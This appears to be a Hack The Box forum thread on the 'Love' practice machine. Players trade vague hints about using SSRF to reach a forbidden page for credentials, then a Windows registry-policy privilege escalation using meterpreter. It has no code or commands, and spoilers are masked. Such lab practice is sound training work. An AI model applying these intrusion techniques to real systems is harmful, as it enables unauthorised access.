Official Love Discussion

Rooted! thx to some tips in this forum

Spoiler Removed

Could someone DM me this a tip for the foothold ? I found the ‘beta’ page I can interact with, but I struggle to find a valid file to throw there… Much appreciated !

Type your comment> @anir08 said:

Rooted.

For anyone looking at the forums searching for hints, I’m gonna be blunt and say this: You know what you know and you don’t know what you don’t know! Stop with that TryHard thing!
My hints:

FootHold/User
Let your nmap be aggressive and read the output very carefully! Half of the steps to Foothold lies there! Got it? Nice!
Make the necessary changes. Cool!
Now head over to the “secret” area which was not available before and manually enumerate it very carefully! Like use your EYES instead of firing off gobuster and wfuzz.
Then read about this:
What is SSRF (Server-side request forgery)? Tutorial & Examples | Web Security Academy
Read it? Now you know what to do!

Take a step back and let the snake take the auto-pilot from there!!

Escalation/System
I’d be real honest here…if you don’t have a solid windows priv-esc methodology, you won’t be able to do this. Its more like a hit-error-success thingy. Without giving away much, enumerate registry keys and look for software policies…google a lot and you’ll end up on a famous blog website which explains exactly what it is. From there its 2 minutes to system

I fell into the Rabbit Hole concerning the ***i and lost 2 hours until looked at it again from the top side. Sometimes you need to take a breather!
Good Luck!
El-Psy-Kongroo!

(Also why the ■■■■ can’t I submit the flags ■■■■)

Edit: Flag submitted- had to revert it two times (sorry if I caused disturbances to others in that time)

Thanks! I was trying all the right things… but the link helped me with the right format

Type your comment> @Ob1lan said:

Could someone DM me this a tip for the foothold ? I found the ‘beta’ page I can interact with, but I struggle to find a valid file to throw there… Much appreciated !

Same here, I would really appreciate some help…

On the beta, I can read files and believe me, I tried hundreds, I did not find anything interesting. Could somebody tell me if this is the right way to go - look at the content of files? I went down the SSRF road as well, but no success.

I gladly went down every rabbit hole there was, even tried cracking hashes I found for two hours ^^

EDIT: Thanks @NoMad for the reinsurance that simple SSRF is the way to go! Root part took like 5 minutes, luckily its one of the first things I check manually. :wink:

I found Vote Admin Creds… but I’m not able to login with them??

Type your comment> @quantumtheory said:

I found Vote Admin Creds… but I’m not able to login with them??

Make sure you copy/paste correctly… Some pesky characters can follow sometimes :wink:

Type your comment> @Ob1lan said:

Type your comment> @quantumtheory said:

I found Vote Admin Creds… but I’m not able to login with them??

Make sure you copy/paste correctly… Some pesky characters can follow sometimes :wink:

I get the same error whether I try pasting, typing manually, with/without the extra spaces, etc… Not sure how else to go about it really. Was thinking I just had the wrong creds, but I’ve seen elsewhere that the creds I found are indeed the correct ones. I duno

Fun box!

Could someone DM with assistance. I need to understand what I am missing. I have the workings of the foothold, just unsure what exactly I should be targeting. Thank you in advance.

Edit: I played around a little more and got my start.

Edit Edit: Rooted. Priv Escalation is Easy Peasy.

Got user, enjoyed that, however struggling on PrivEsc.

Shell doesnt seem to be stable whatsoever. My mr shell doest even spawn, even with encoding, and the only successful shell has been a standard non-mr, but even that dies after a few minutes… any nudges? Dont need much, just a stable platform to start PrivEsc from.

Rooted

Can I DM someone? I’m still having issues… I have what I believe is what I need to proceed, but nothing is working…

Type your Would someone give me a hand? I’m stuck in user, I’ve used dirb but I don’t see anything, just several shells already uploaded that I don’t know how to take advantage of

Type your comment> @quantumtheory said:

I found Vote Admin Creds… but I’m not able to login with them??

Make sure you are logging to the correct website.

There’s one that asks for the user id and one that asks for the username. Make sure you are loging into the later one

Finally rooted after a couple of days banging my head against the wall trying to find user.
Privilege escalation on the box isn’t exactly a walk in the park if you’ve never done Windows boxes before imo, but nothing extremely fancy either.

Either way, fun box!

DM if you need any nudges

Finally I got user and root. I spent too many hours trying to get the initial steps through the enumeration using S**F. From there, it was easy to get a shell, and the privesc was done by following the steps you can google easily for windows enumeration.

Pepe

Type your comment> @quantumtheory said:

Type your comment> @Ob1lan said:

Type your comment> @quantumtheory said:

I found Vote Admin Creds… but I’m not able to login with them??

Make sure you copy/paste correctly… Some pesky characters can follow sometimes :wink:

I get the same error whether I try pasting, typing manually, with/without the extra spaces, etc… Not sure how else to go about it really. Was thinking I just had the wrong creds, but I’ve seen elsewhere that the creds I found are indeed the correct ones. I duno

@quantumtheory i have the same problem dude, i’m on right page, right creds, i tried removing the !! part also, tried with hydra, tried curling, tried any virutal possible solution to this problem and still it gives me incorrect password but i id l********:**00 like you probably in “secret” page for file checking… and man it won’t budge it’s driving me nuts man, is 1AM and i work at 6AM and i still don’t wanna go to sleep… ■■■■ my life :frowning:

After a lot of frustration (and hours of trying) I managed to get the root as well!!

The thing is that I actually happened to open a win priv esc website at the correct chapter, and after checking some registry keys I knew what to do. BUT… no matter what I did, it just didn’t work. Among others, I tried everyone’s favorite hacking console ;), which even said the target is vulnerable, but still wouldn’t give me a session. I tried via cmd and powershell, but the furthest I got was an error message stating “The Windows Ir Service could not be accessed. This can occur if the Windows Ir is not correctly installed.” I even started suspecting that someone is messing with this box, but a restart didn’t solve the problem.

After starting over from the very beginning I found out that there is actually another very different way to get in to the system as user!! This second route is a bit longer, but the correct one. Repeating everything here works like a charm. I can root the box using all of the above methods, which neither of worked when accessing the system differently.

So here is my question to you gurus: why don’t the e*****i command (the last command which gives the root) work on the same exact payload file planted in the system, when the system is accessed via winrm? I did some studying and learned that this method executes in session 0 where as the correct route executes in session 1. I am kind of guessing this relates to the explanation, as everything else looks the same (I have two meterpreter consoles open side by side and can not find any other differences). Is someone able to explain this? Would appreciate much, thanks :slight_smile:

ps. the rabbit hole was too deep!!

User: Just read the output of the nmap line-by-line, you will find another way. Now if you found this new place , see what things you can do with tool/service present there. Try to access those things which are forbidden for you in first place. This will give you a set of creds, be careful where are you using these creds.

Root: This is the easy part. Try to “Elevate” yourself from user to admin. :wink:

DM me for the hints.